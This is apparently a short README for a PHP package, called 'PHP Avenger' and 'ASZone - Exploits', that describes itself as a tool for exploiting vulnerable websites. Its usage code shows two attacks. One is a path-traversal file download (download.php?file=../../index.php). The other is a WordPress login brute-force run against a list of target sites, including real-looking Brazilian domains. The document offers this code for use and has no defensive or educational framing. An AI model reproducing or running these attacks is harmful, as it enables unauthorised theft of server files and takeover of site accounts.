ASZone - Exploits - Local File Download ASZone - Exploits - Brute Force in WordPress
Reading Static File is a open source package for exploting vulnerables sites
The recommended way to install PHP Avenger is through Composer.
# Install Composer
curl -sS https://getcomposer.org/installer | php
## Basic Usage Local File Download
```bash
$command=array();
$crawler = new DownloadByLocalFileDownload($command);
$url="http://www.xxxx.com/download.php?file=../../index.php";
$crawler->getAllFiles($url);
$command=array();
$btwp = new BruteForceWordPress($command);
$listSite[]='http://www.site1.org.br/wp-login.php';
$listSite[]='http://site2.com.br/wp-login.php';
$btwp->execute($listSite);